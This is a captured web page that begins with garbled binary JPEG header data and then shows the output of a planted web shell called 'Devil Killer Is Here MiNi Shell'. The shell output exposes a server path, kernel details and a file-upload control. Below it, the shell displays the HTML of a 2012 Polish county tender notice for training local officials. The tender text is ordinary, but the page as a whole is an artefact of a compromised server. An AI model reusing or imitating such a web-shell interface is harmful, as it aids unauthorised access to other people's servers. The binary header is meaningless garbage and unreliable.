JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120213/43092-N-2012.html

<p class="kh_header"><b>Bielsko-Biała: Organizację i przeprowadzenie szkoleń dla realizacji projektu pn. Sprawny samorząd - kompetentny urzędnik, współfinansowanego ze środków Europejskiego Funduszu Społecznego , Priorytet V Dobre rządzenie, Działanie 5.2 wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania 
w administracji samorządowej Programu Operacyjnego Kapitał Ludzki 
na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 43092 - 2012; data zamieszczenia: 13.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Bielski , ul. Piastowska 40, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8136800, faks 033 8220672.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizację i przeprowadzenie szkoleń dla realizacji projektu pn. Sprawny samorząd - kompetentny urzędnik, współfinansowanego ze środków Europejskiego Funduszu Społecznego , Priorytet V Dobre rządzenie, Działanie 5.2 wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania 
w administracji samorządowej Programu Operacyjnego Kapitał Ludzki 
na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkoleń dla realizacji projektu pn. Sprawny samorząd - kompetentny urzędnik, współfinansowanego ze środków Europejskiego Funduszu Społecznego , Priorytet V Dobre rządzenie, Działanie 5.2 wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania 
w administracji samorządowej Programu Operacyjnego Kapitał Ludzki 
na lata 2007-2013
o wartości szacunkowej poniżej progów ustalonych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 roku- Prawo zamówień publicznych 
(tj. Dz. z 2010 roku Nr 113 poz.759 z póź. zm.)3.2. Szkolenia podzielone zostały na kilka zadań wg poniższego zestawienia:
Zadanie 1
1.Doskonalenie obsługi klienta - 4 grupy, 45 osób, 16 godzin dla 1 grupy
2.Rozwiązywanie problemów z trudnym klientem - 4 grupy, 45 osób, 16 godzin dla 1 grupy
3.Profesjonalny urzędnik - 4 grupy, 45 osób, 16 godzin dla 1 grupy 
4.Kodeks postępowania administracyjnego - 4 grupy, 45 osób, 16 godzin dla 1 grupy
5.Prawo administracyjne i ustawy - 4 grupy, 45 osób, 16 godzin dla 1 grupy
Zadanie 2
1.Zarządzanie strategią - 2 grupy, 24 osoby, 16 godzin dla 1 grupy 
2.Komunikowanie strategii - 2 grupy, 24 osoby, 16 godzin dla 1 grupy 
3.Zarządzanie zespołami zadaniowymi - 2 grupy, 24 osoby, 16 godzin dla 1 grupy 
4.Zarządzanie zmianą 2 grupy, 24 osoby,16 godzin dla 1 grupy
5.Zarządzanie budżetem zadaniowym - 2 grupy, 24 osoby, 16 godzin dla 1 grupy
6.Finanse i kontroling w JST - 2 grupy, 24 osoby, 16 godzin dla 1 grupy 
Zadanie 3
1.MS Word w praktyce - 3 grupy, 30 osób,16 godzin dla 1 grupy 
2.MS Excel w praktyce - 3 grupy, 30 osób,16 godzin dla 1 grupy 
Zadanie 4
1.Warsztaty doskonalące wiedzę z SZBI i SZJ. - 2 grupy, 22 osoby, 16 godzin dla 1 grupy 
2.Warsztaty doskonalące dla audytorów ISO - 1 grupa, 13 osób, 16 godzin dla 1 grupy., 
Zadanie 5
1.Kontrola zarządcza - 2 grupy, 22 osoby, 24 godziny dla 1 grupy

3.3. Dla każdego realizowanego szkolenia wykonawca:
1.przeprowadzi analizę potrzeb szkoleniowych w celu doprecyzowania programów szkoleń i dostosowania ich do potrzeb zamawiającego, 
2.opracuje i przygotuje materiały szkoleniowe dla każdego uczestnika w postaci segregatora, notatnika i długopisu, 
3.przygotuje pre i post testy wypełniane przez każdego z uczestników sprawdzające przyrost wiedzy i umiejętności po szkoleniu, które przeprowadzi na początku i końcu każdego szkolenia, 
4.przygotuje dziennik zajęć, listę obecności uczestników - nazwiska uczestników otrzyma od zamawiającego nie później niż 7 dni przed terminem szkolenia,  
5.przygotuje certyfikaty ukończenia szkolenia dla uczestników, 
6.przygotuje ankiety satysfakcji uczestników szkolenia które przeprowadzi po każdym szkoleniu, 
7.zrealizuje szkolenie w liczbie godzin zgodnej z wyżej opisaną specyfikacją 
i z harmonogramem, który otrzyma od zamawiającego.
Dokumentacja szkoleniowa, ankiety, testy, listy uczestników, potwierdzenia odbioru certyfikatów, certyfikaty  oraz materiały szkoleniowe, segregatory i notatniki muszą zawierać informacje o dofinansowaniu projektu z Europejskiego Funduszu Społecznego zgodnie 
z logotypami wymaganymi przez  Instytucję Pośredniczącą tj. Ministerstwo Administracji 
i Cyfryzacji. 

3.4. Dla szkoleń z zadania 4 tj.  
1.Warsztaty doskonalące wiedzę z SZBI i SZJ. - 2 grupy, 22 osoby, 16 godzin dla 1 grupy
2.Warsztaty doskonalące dla audytorów ISO - 1 grupa, 13 osób, 16 godzin  dla 1 grupy Wykonawca zapewni: dla każdej grupy szkoleniowej po:
1.1 noclegu dla każdego uczestnika miedzy pierwszym a drugim dniem szkolenia,  
2.wyżywienie; pierwszego dnia szkolenia obiad i kolację, drugiego dnia śniadanie i obiad dla każdego uczestnika,
3.dodatkowo możliwość noclegu i wyżywienia dla 1 dodatkowej osoby (trenera)- cena tej usługi nie wchodzi w zakres opisywanego zamówienia,
4.salę szkoleniową  z pełnym wyposażeniem na każdy dzień szkolenia, 
5.serwis kawowy (2 przerwy kawowe dziennie dla wszystkich uczestników szkolenia + 1trener), 
6.transport każdej grupy (11-13 osób) do obiektu hotelowego w odległości nie większej niż 100 km od Starostwa Powiatowego w Bielsku Białej każdego dnia szkolenia tam i z powrotem.
Wykonawca zaproponuje organizację  i przeprowadzenie usługi szkoleniowej w min. 2 rożnych obiektach hotelowych.
Wykonawca zapewni możliwość zmiany każdego z obiektów hotelowych na równorzędny na życzenie zamawiającego na min. 1 tydzień przed planowanym terminem szkolenia ( zgodnie z warunkami cenowymi przedstawionymi w swojej ofercie.)
 
3.4.1. Minimalne wymagania dotyczące zakwaterowania: 
 1)Wykonawca zakwateruje uczestników szkolenia w obiekcie hotelowym o standardzie odpowiadającym 3 gwiazdkowemu hotelowi w odległości max do 100 km od Starostwa Powiatowego w Bielsku Białej.
2)W cenie zakwaterowania musi być ujęta opłata klimatyczna - jeżeli obowiązuje.
Zakwaterowanie w pokojach 1, 2 - osobowych, w tym zakwaterowania min. 2 osób w pokojach 1 osobowych. 
3)Pokoje dwuosobowe  muszą być wyposażone w oddzielne łóżka. Wykonawca zobowiązany
jest do udostępnienia pokoi dla uczestników szkolenia minimum 1h przed rozpoczęciem szkolenia i do 30 min po zakończeniu szkolenia - niezależnie od  własnych ustaleń dotyczących godzin rozpoczęcia i zakończenia doby hotelowej. 
4)W trakcie świadczenia usługi Zamawiającemu nie mogą być świadczone w obiekcie inne usługi hotelarsko - gastronomiczne, bezpośrednio naruszające realizację programu szkolenia. 

3.4.2 Minimalne wymagania dotyczące wyżywienia:
1. Uczestnikom szkolenia zostaną podane: 
a)Pierwszego dnia szkolenia - obiad i kolacja. 
b)Drugiego dnia szkolenia - śniadanie i obiad. 
Śniadanie musi być podane w formie bufetu szwedzkiego. 
Obiad musi składać się z przystawki, zupy i dania głównego, soku owocowego  oraz deseru, herbaty, kawy. 
Kolacja podana przy wspólnym, stole dla wszystkich uczestników szkolenia. Składać się będzie z:  przystawek i dania podawanego na ciepło. Dodatkowo pieczywo, masło, soki owocowe, woda mineralna gazowana i niegazowana, kawa i herbata podana na życzenie, cukier. 

3.4.3. Minimalne wymagania dotyczące sali szkoleniowej:
 1)Sala wykładowa o pojemności nie mniejszej niż 20 osób (min. 40 m2)  znajduje się w tym samym budynku co pokoje hotelowe i sala restauracyjna. Sala z pełnym wyposażeniem
- stół konferencyjny i krzesła, stolik i krzesło dla prelegenta, ekran, flipchart + blok papierowy, flamastry, dostęp do Internetu, dostęp do gniazd umożliwiających podłączenie urządzeń elektrycznych. 
2) W każdym dniu szkolenia zostaną zorganizowane dwie przerwy kawowe, w trakcie których zostanie podana: kawa, herbata, woda mineralna (gazowana i niegazowana), soki,
cukier, mleczko, ciastka kruche. Przerwy kawowe zostaną zorganizowane w tym samym budynku co szkolenia (najlepiej w tej samej sali lub jej sąsiedztwie). 



3.4.4. Minimalne wymagania dotyczące transportu:
1) Bus z klimatyzacją podstawiony pierwszego dnia szkolenia o godz. 7.00 pod siedzibę Starostwa Powiatowego w Bielsku Białej, Trasa Bielsko-Biała - obiekt hotelowy w odległości do 100 km od Starostwa Powiatowego w Bielsku-Białej. 
Bus z klimatyzacja podstawiony o godz. 17.15 drugiego dnia szkolenia pod obiektem hotelowym. Trasa Obiekt hotelowy - Starostwo Powiatowe w Bielsku Białej.

3.5. Dla szkoleń z zadania 1, 2 i 5 tj.:
1.Doskonalenie obsługi klienta - 4 grupy, 45 osób, 16 godzin dla 1 grupy
2.Rozwiązywanie problemów z trudnym klientem - 4 grupy, 45 osób, 16 godzin dla 1grupy
3.Profesjonalny urzędnik - 4 grupy, 45 osób, 16 godzin dla 1 grupy
4.Kodeks postępowania administracyjnego - 4 grupy, 45 osób, 16 godzin dla 1 grupy
5.Prawo administracyjne i ustawy - 4 grupy, 45 osób, 16 godzin dla  1 grupy dla 1grupy
6.Zarządzanie strategią - 2 grupy, 24 osoby, 16 godzin dla 1 grupy
7.Komunikowanie strategii - 2 grupy, 24 osoby, 16 godzin dla 1 grupy
8.Zarządzanie zespołami zadaniowymi - 2 grupy, 24 osoby, 16 godzin dla 1 grupy
9.Zarządzanie zmianą - 2 grupy, 24 osoby, 16 godzin dla 1 grupy
10.Zarządzanie budżetem zadaniowym - 2 grupy, 24 osoby, 16 godzin dla 1 grupy
11.Finanse i kontroling w JST - 2 grupy, 24 osoby, 16 godzin dla grupy
12.Kontrola zarządcza - 2 grupy, 22 osoby, 24 godziny dla 1 grupy
Wykonawca zapewni
1.sale szkoleniową na każdy dzień szkolenia w obiekcie hotelowym o standardzie odpowiadającym 3 gwiazdkowemu hotelowi w odległości max do 100 km od Starostwa Powiatowego w Bielsku Białej, 
2.obiad dla każdego uczestnika w trakcie każdego dnia szkolenia, 
3.serwis kawowy (1 przerwa kawowa dziennie dla wszystkich uczestników szkolenia +1trener), 
4. transport ze Starostwa Powiatowego w Bielski Białej do obiektu hotelowego i z powrotem każdego dnia szkolenia. 
Wykonawca zaproponuje organizację i przeprowadzenie usługi szkoleniowej w min. dwóch rożnych lokalizacjach. 
Wykonawca zapewni możliwość zmiany każdej z sal na równorzędną na życzenie zamawiającego na min. 1 tydzień przed planowanym terminem szkolenia ( zgodnie z ceną określoną w ofercie).


3.5.1 Minimalne wymagania dotyczące sali szkoleniowej:
Sala wykładowa o pojemności nie mniejszej niż 20 osób (min. 40 m2) z pełnym wyposażeniem - stół konferencyjny i krzesła, stolik i krzesło dla prelegenta, ekran, flipchart + blok papierowy, flamastry, dostęp do Internetu, dostęp do gniazd umożliwiających podłączenie urządzeń elektrycznych. 
W każdym dniu szkolenia zostanie zorganizowana jedna  przerwa  kawowa, w trakcie których zostanie podana: kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche. Przerwy kawowe zostaną podane w tym samym budynku co szkolenia. 

3.5.2Minimalne wymagania dotyczące obiadu
Obiad musi składać się z dania głównego oraz herbaty, kawy. 

3.5.3Minimalne wymagania dotyczące transportu
Bus z klimatyzacją podstawiony każdego dnia szkolenia o godz. 7.00 pod siedzibę Starostwa Powiatowego w Bielsku Białej. Trasa Bielsko-Biała - obiekt hotelowy w odległości do 100 km od Starostwa Powiatowego w Bielsku-Białej. 
Bus z klimatyzacja podstawiony o godz. 17.15 każdego dnia szkolenia pod obiektem hotelowym. Trasa Obiekt hotelowy - Starostwo Powiatowe w Bielsku Białej. 

3.6. Dla szkoleń z zadania 3, które odbędą się w Sali konferencyjnej Starostwa Powiatowego w Bielsku Białej 
1.MS Word w praktyce - 3 grupy, 30 osób, 16 godzin dla 1 grupy 
2.MS Excel w praktyce - 3 grupy, 30 osób, 16 godzin dla 1 grupy
Wykonawca zapewni: 
1.Catering w postaci lunchu 
2.serwis kawowy (1 przerwa kawowa dziennie dla wszystkich uczestników szkolenia + 1 trener) kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche.Przerwy kawowe zostaną podane w tym samym budynku co szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.00.00.00-0, 60.14.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie trzech ostatnich lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy w tym okresie - wykonywał, a w przypadku świadczeń okresowych lub ciągłych wykonuje co najmniej dwie usługi w zakresie organizacji i przeprowadzenia szkoleń o wartości powyżej 200.000 zł każda, w tym co najmniej 1 dla administracji samorządowej, w których grupę docelową stanowiło co najmniej 100  beneficjentów,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamówienia w tym:
1) co najmniej 3 trenerów dla bloków szkoleniowych w zadaniu 1 i 2, którzy posiadają wykształcenie wyższe i przeprowadzili w ramach tematyki danego bloku w ciągu ostatnich 3 lat min. 100 godzin szkoleniowych, w tym co najmniej 50 dla administracji samorządowej, 
2)co najmniej 2 trenerów dla bloków szkoleniowych w zadaniu 3, 4, 5, którzy posiadają wykształcenie wyższe i przeprowadzili w ramach tematyki danego bloku w ciągu ostatnich 3 lat min. 100 godzin szkoleniowych, w tym co najmniej 50 dla administracji samorządowej, 
3)2 osobami dla zadania 4, w tym jedna posiadająca uprawnienia pełnomocnika ds. ISO:9001 oraz, która  nadzorowała wdrażanie SZJ przynajmniej w jednej jednostce samorządu terytorialnego i  jedna z uprawnieniami audytora wewnętrznego SZBJ oraz informacją o podstawie do dysponowania tymi osobami</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz ofertowy - Załącznik nr 1 do SIWZ;
2)Dokument zawierający kompletność programów szkoleniowych,
3)Dokument z wykazem liczby metod/działań, które podejmie Wykonawca w celu zapewnienia najwyższej jakości dla zadania organizacji i prowadzenia szkoleń-zał.Nr 2 do SIWZ,
4) Dokument z analizą zamówienia ze wskazaniem problemów i zagrożeń związanych z realizacją organizacji i prowadzenia szkoleń i propozycjami rozwiązań problemów   bądź zapobiegania nim-zał.Nr 3 do SIWZ,
5 ) Dokument, w którym określona zostanie elastyczność  dokonywania ewentualnej  zmiany rezerwacji  hotelu lub sali bez ponoszenia kosztów z tym związanych-zał.Nr 4  do SIWZ.
6) wykaz proponowanych obiektów hotelowych dla realizacji szkoleń obiętych przedmiotem   zamówienia -zał. Nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 35</li>
<li>2 - Kompletność programów szkoleniowych - 10</li>
<li>3 - Organizacja kontroli jakości dla organizacji i prowadzenia szkoleń - 25</li>
<li>4 - Wartość techniczna tj.analiza ryzyk i zagrożeń w realizacji usługi organizacji i prowadzenia szkoleń i sposobów zapobiegania im - 20</li>
<li>5 - Elastyczność dokonywania ewentualnej zmiany rezerwacji w obiekcie hotelowym - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza istotne  zmiany postanowień  umowy w stosunku do treści oferty, na podstawie której wykonawca został wybrany do realizacji umowy w  następujących przypadkach: 
1)uzasadnionej konieczności zmiany osób, które będą uczestniczyć w wykonywaniu umowy na inne legitymujące się co najmniej równoważnymi kwalifikacjami zawodowymi, doświadczeniem, wykształceniem ,które  było wymagane przez Zamawiającego w SIWZ i w ogłoszeniu,
2)w przypadku uzasadnionej konieczności zmiany terminu realizacji projektu, za zgodą Instytucji Pośredniczącej dopuszcza się możliwość zmiany terminu realizacji umowy,  

3) zmiany obiektu hotelowego  pod warunkiem spełniania przez nowy obiekt kryteriów szczegółowo określonych w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
